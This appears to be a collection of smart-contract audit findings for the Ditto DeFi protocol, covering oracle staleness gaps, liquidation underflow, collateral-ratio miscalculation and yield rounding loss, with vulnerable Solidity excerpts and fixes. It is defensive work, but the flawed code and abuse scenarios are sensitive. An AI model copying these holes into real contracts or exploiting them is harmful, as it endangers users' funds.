```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n
Secondary short liquidation reverts due to arithmetic underflow in volatile market conditions
medium
The `ercDebtAtOraclePrice` is calculated based on the cached Oracle price, which is not updated with the retrieved, potentially fresh spot price due to the 15-minute staleness limit at the beginning of the secondary liquidation call. This results in the `ercDebtAtOraclePrice` being greater than the short's available collateral, resulting in an underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from the `m.short.collateral`.\\nShorts with a collateral ratio below `secondaryLiquidationCR`, i.e., 150% by default, can be liquidated in batches via the secondary liquidation mechanism, executed via the `MarginCallSecondaryFacet.liquidateSecondary` function.\\nAll shorts within the batch are iterated, and for each short, important values are kept in memory within the `MTypes.MarginCallSecondary` struct, evaluated in the `_setMarginCallStruct` function. The collateral ratio, `m.cRatio`, is calculated via the `LibShortRecord.getCollateralRatioSpotPrice` function, based on the given oracle price.\\nThe Oracle price is determined by the `LibOracle.getSavedOrSpotOraclePrice` function in line 47, which either returns the current spot price if the cached price is stale (older than 15 min) or the cached price.\\n```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n\\nFurther on, the liquidation proceeds in the `_secondaryLiquidationHelper` function. If the short's `cRatio` is greater than 100% in line 166, the remaining collateral (i.e., the collateral minus the debt) is refunded. It is either refunded to the shorter if the `cRatio` is greater than 110% (m.minimumCR), or, otherwise, to the TAPP (address(this)).\\ncontracts/facets/MarginCallSecondaryFacet.sol#L177\\n```\\nfunction _secondaryLiquidationHelper(MTypes.MarginCallSecondary memory m) private {\\n // @dev when cRatio <= 1 liquidator eats loss, so it's expected that only TAPP would call\\n m.liquidatorCollateral = m.short.collateral;\\n if (m.cRatio > 1 ether) {\\n uint88 ercDebtAtOraclePrice =\\n m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n m.liquidatorCollateral = ercDebtAtOraclePrice;\\n // if cRatio > 110%, shorter gets remaining collateral\\n // Otherwise they take a penalty, and remaining goes to the pool\\n address remainingCollateralAddress =\\n m.cRatio > m.minimumCR ? m.shorter : address(this);\\n s.vaultUser[m.vault][remainingCollateralAddress].ethEscrowed +=\\n❌ m.short.collateral - ercDebtAtOraclePrice;\\n }\\n LibShortRecord.disburseCollateral(\\n m.asset,\\n m.shorter,\\n m.short.collateral,\\n m.short.zethYieldRate,\\n m.short.updatedAt\\n );\\n LibShortRecord.deleteShortRecord(m.asset, m.shorter, m.short.id);\\n}\\n```\\n\\nThe value of the debt, `ercDebtAtOraclePrice`, is calculated based on the currently cached price, as the `LibOracle.getPrice` function returns the stored price.\\n[!NOTE] The initially retrieved Oracle price at the beginning of the liquidation call, returned by the `LibOracle.getSavedOrSpotOraclePrice` function, does not store the retrieved spot price in storage if the cached price is stale.\\nConsequently, there are potentially two different asset prices used. The asset's spot price and the cached, stale oracle price.\\nConsider the case where there is a significant difference between the spot price and the cached price. This would calculate the `m.cRatio` based on the spot price and the `ercDebtAtOraclePrice` based on the cached price.\\nThis is demonstrated in the following example:\\nConsider the following liquidateable short position (simplified, ignores decimal precision for this demonstration):\\nCollateral Debt Collateralization Ratio (based on spot price) Price ETH/USD Spot Price TOKEN/ETH Cached Price TOKEN/ETH\\n1 ETH 1400 TOKEN $${1 \\over {1400 * 0.0005}} \\approx 142\\%$$ 2000 0.0005 0.00075\\nCalculating the `ercDebtAtOraclePrice` with the cached oracle price `0.00075` for TOKEN/ETH, returned by the `LibOracle.getPrice` function, results in:\\n$$ \\begin{align} ercDebtAtOraclePrice &= debt \\cdot price \\ &= 1400 \\cdot 0.00075 \\ &= 1.05 \\text{ ETH} \\end{align} $$\\nThe resulting debt value, quoted in ETH, is `1.05 ETH`, which is larger than the short's available collateral, `m.short.collateral = 1 ETH`.\\nThis results in an arithmetic underflow error attempting to subtract the calculated `ercDebtAtOraclePrice` from `m.short.collateral` in line 177.\\nSpecifically, this scenario occurs in the following situation:\\nA user opens a short position with a collateral of $1 \\text{ ETH}$ and a debt of $1400 \\text{ TOKEN}$ at TOKEN/ETH price of $0.00014286 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00014286 = 0.2 \\text{ ETH}$ -> CR = $1/0.2 = 500\\%$\\nThe spot (oracle) price of TOKEN/ETH increases from $0.00014286 \\text{ ETH}$ to $0.00075 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00075 = 1.05 \\text{ ETH}$ -> CR = $1 / 1.05 \\approx 95\\%$ (eligible for secondary liquidation - also for primary liquidation due to < 110%)\\nNew orders for the TOKEN asset are added to the order book, leading to the oracle price being updated/cached to $0.00075 \\text{ ETH}$ per TOKEN\\n~15min after the price got updated and cached, the TOKEN/ETH spot price decreases from $0.00075 \\text{ ETH}$ to $0.0005 \\text{ ETH}$. The CR improves -> CR = $1/(1400 * 0.0005) \\approx 142\\%$\\nSecondary liquidation is attempted to liquidate the short (primary short liquidation is not possible due to the 110% CR limit)\\nDuring the secondary liquidation call, `m.cRatio` is calculated based on the recent spot price (in step 4, due to cached price older than 15min) of $0.0005 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.0005 = 0.7 \\text{ ETH}$ -> CR = $ 1 / 0.7 \\approx 142\\%$\\nIn line 168, `ercDebtAtOraclePrice` is calculated based on the previously cached oracle price of $0.00075 \\text{ ETH}$ -> $1400 * 0.00075 = 1.05 \\text{ ETH}$\\nIn line 176, `m.short.collateral` is subtracted by `ercDebtAtOraclePrice` -> $1 - 1.05= -0.05 \\text{ ETH}$ -> arithmetic underflow error -> reverts!
Consider also using the minimum of the `m.short.collateral` and `ercDebtAtOraclePrice` values, as similarly done in lines 204-205.
The secondary short liquidation mechanism reverts in certain market situations, forcing liquidators to wait for the CR to decrease further to be able to use the primary liquidation mechanism. This puts the overall collateral ratio and, thus the asset peg under pressure as liquidations can not be executed in a timely manner.
```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n
Lack of essential stale check in oracleCircuitBreaker()
medium
The `LibOracle::oracleCircuitBreaker()` lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp" when compared to the `baseOracleCircuitBreaker()`.\\nWithout the check of the condition: "block.timestamp > 2 hours + baseTimeStamp", the `oracleCircuitBreaker()` will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nFor this reason, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale.\\n```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: "block.timestamp > 2 hours + baseTimeStamp"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n\\nThe oracleCircuitBreaker() lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp": https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L120-L123\\nWhereas the baseOracleCircuitBreaker() checks that condition: https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L73
Add the condition: "block.timestamp > 2 hours + baseTimeStamp" in the `oracleCircuitBreaker()` to provide the stale check.\\n```\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n// Remove the line below\\n || baseChainlinkPrice <= 0;\\n// Add the line below\\n || baseChainlinkPrice <= 0 || block.timestamp > 2 hours // Add the line below\\n baseTimeStamp;\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n```\\n
This report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nConsequently, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale. The stale price will be consumed by core functions of the protocol, leading to harming the funds of the protocol and its users.
```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: "block.timestamp > 2 hours + baseTimeStamp"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n
LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation
low
As per the documentation, LibOracle should only be returning the TWAP price from the WETH/USDC pool if the amount of WETH in the pool is >= 100e18. This is to ensure the fidelity of the data, which reduces the risk of price manipulation. However, this is not properly implemented for the case in which there was an invalid fetch of chainlink data. In this case, LibOracle simply returns the TWAP price without checking if there's enough liquidity in the pool. This can lead to a lack of data fidelity for the returned price.\\nIt's clear that reverting should be the correct action rather than returning the TWAP price without checking the liquidity, as even when there is a valid chainlink price, if the TWAP price is closer to the cached price (and there isn't enough liquidity), it will still revert.\\nLibOracle has a `baseOracleCircuitBreaker` function which handles whether to return the TWAP price or the chainlink price, when the asset is USD, and it is defined as follows:\\n```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n\\nWhen `invalidFetchData` is true, meaning that the chainlink price was not properly fetched, it will always return `twapPriceInv`. However, this lacks any checks as to whether there is at least 100 WETH in the Uniswap pool, which can result in a lack of data fidelity.
LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation\\nBefore returning the TWAP price when `invalidFetchData` is true, first check whether the WETH/USDC pool has enough liquidity.
When the chainlink oracle is not functioning correctly, LibOracle will always return the TWAP price for the USD asset. However, this lacks any check as to whether there is enough liquidity in the Uniswap pool to guarantee data fidelity, meaning there is a higher likelihood of price manipulation.
```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n
Decreasing and increasing a short's collateral potentially uses an outdated asset price to calculate the collateral ratio
medium
The `decreaseCollateral` and `increaseCollateral` functions in the `ShortRecordFacet` contract calculate the short's collateral ratio based on the cached asset price, which may be outdated, leading to a divergence between the actual collateral ratio (based on the asset spot price) and the calculated collateral ratio.\\nAccording to the conditions for updating the oracle, decreasing the short's collateral via the `ShortRecordFacet.decreaseCollateral` function should update the oracle price if the oracle price is older than 15 minutes.\\nHowever, in the current implementation of the `decreaseCollateral` function, the short's collateral ratio, `cRatio`, is calculated by calling the `getCollateralRatio` function in line 94:\\n```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n\\nThe called `getCollateralRatio` function uses the `LibOracle.getPrice` function to calculate the collateral ratio:\\n```\\nfunction getCollateralRatio(STypes.ShortRecord memory short, address asset)\\n internal\\n view\\n returns (uint256 cRatio)\\n{\\n return short.collateral.div(short.ercDebt.mul(LibOracle.getPrice(asset)));\\n}\\n```\\n\\nThe `LibOracle.getPrice` function returns the currently cached asset price, which potentially is older than 15 minutes.\\n```\\nfunction getPrice(address asset) internal view returns (uint80 oraclePrice) {\\n AppStorage storage s = appStorage();\\n return uint80(s.bids[asset][Constants.HEAD].ercAmount);\\n}\\n```\\n\\nConsequently, the calculated `cRatio` in line 94 of the `decreaseCollateral` function is based on the potentially outdated asset price, resulting in the collateral ratio being inaccurate and diverging from the actual collateral ratio based on the current asset spot price.\\nA short owner can exploit this by decreasing the short's collateral up to the point where the resulting collateral ratio is equal to the initial margin (i.e., 500%). As the collateral ratio, `cRatio`, is calculated in line 94 based on the outdated cached oracle price, the short owner can withdraw more collateral than the actual collateral ratio (based on the asset spot price) would allow.\\nSimilarly, the `increaseCollateral` function is affected as well.
Consider using the `LibOracle.getSavedOrSpotOraclePrice` function together with the `getCollateralRatioSpotPrice` function to calculate the collateral ratio based on the current asset price.
Short-position owners can withdraw more collateral than eligible, negatively affecting the overall asset's collateral ratio.
```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n
Loss of ETH yield due to rounding error when updating the yield rate in the `updateYield` function
low
Updating the vault's yield rate in the `LibVault.updateYield` function can lead to a loss of yield if the newly received ETH yield is small due to rounding errors.\\nThe `updateYield` function in the `LibVault` library is called by the permissionless `YieldFacet.updateYield` function and used to update the vault's yield rate from staking rewards earned by bridge contracts holding LSD.\\nThe newly accumulated yield, i.e., ETH received since the last update, is calculated by subtracting the current `zethTotalNew` from the previously stored yield `zethTotal`, as seen in line 75 of the `updateYield` function.\\ncontracts/libraries/LibVault.sol#L92\\n```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n\\nAfter determining the new `yield` (ETH), a fraction of the `yield` is assigned to the TAPP (treasury). Thereafter, the remaining `yield` is realized by adding it to the vault's `yield` rate (zethYieldRate), which is calculated by dividing the `yield` by the vault's short collateral, `zethCollateral`.\\n[!NOTE] Both the `yield` and `zethCollateral` values are in 18 decimal precision due to tracking ETH balances.\\nBy using the `divU80` function, the `zethYieldRate` is calculated as $zethYieldRate = \\frac{yield \\cdot 10^{18}}{zethCollateral}$\\nHowever, if the numerator is smaller than the denominator, i.e., the received ETH yield is very small and the vault's collateral large enough, the result of the division will be rounded down to 0, leading to a loss of the remaining yield.\\nAs anyone is able to call the public `YieldFacet.updateYield` function, this can be used to maliciously cause a loss of yield for all users if the newly received yield is small.\\nThe following test case demonstrates the described rounding error:\\n
Consider storing the rounding error and applying the correcting factor (error stored) the next time, or alternatively, prevent (skip) updating the yield if the resulting yield is 0.
Loss of LSD ETH yield for users of the same vault.
```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n
Use of hardcoded price deviation in baseOracleCircuitBreaker()
low
The `LibOracle::baseOracleCircuitBreaker()` uses the hardcoded value of 50% price deviation, which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe `baseOracleCircuitBreaker()` is used for verifying the price reported by Chainlink. If the reported price is invalid or its price deviation when compared to the protocol's cached oracle price is more than 50%, the function will fall back to get Uniswap's TWAP price instead.\\nHowever, the `baseOracleCircuitBreaker()` uses a hardcoded value of 50% price deviation (0.5 ether), which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\n```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L77-L78\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L81
The % price deviation should be a variable updatable by the protocol's DAO or admin in production.
This report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe use of the hardcoded value of 50% price deviation (0.5 ether) might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nConsequently, the check for price deviation in the `baseOracleCircuitBreaker()` might not be effective enough for filtering out the stale price in production, directly affecting the quality of the oracle price that will be consumed by the core functions of the `Ditto` protocol (HIGH impact).
```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n
Emitting incorrect event value
low
The `LibShortRecord::burnNFT()` emits an incorrect event value.\\nThe `burnNFT()` emits an incorrect event value: `nft.owner`. Specifically, the `nft` variable will point to the storage object specified by the `tokenId`. However, the pointing storage object will be deleted before emitting the `Transfer` event.\\nSubsequently, the `ERC721::Transfer` event will be emitted with `nft.owner` == `address(0)`.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L366\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L371\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L374
Emit the `Transfer` event before the `delete` operations.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n// Add the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n// Remove the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n
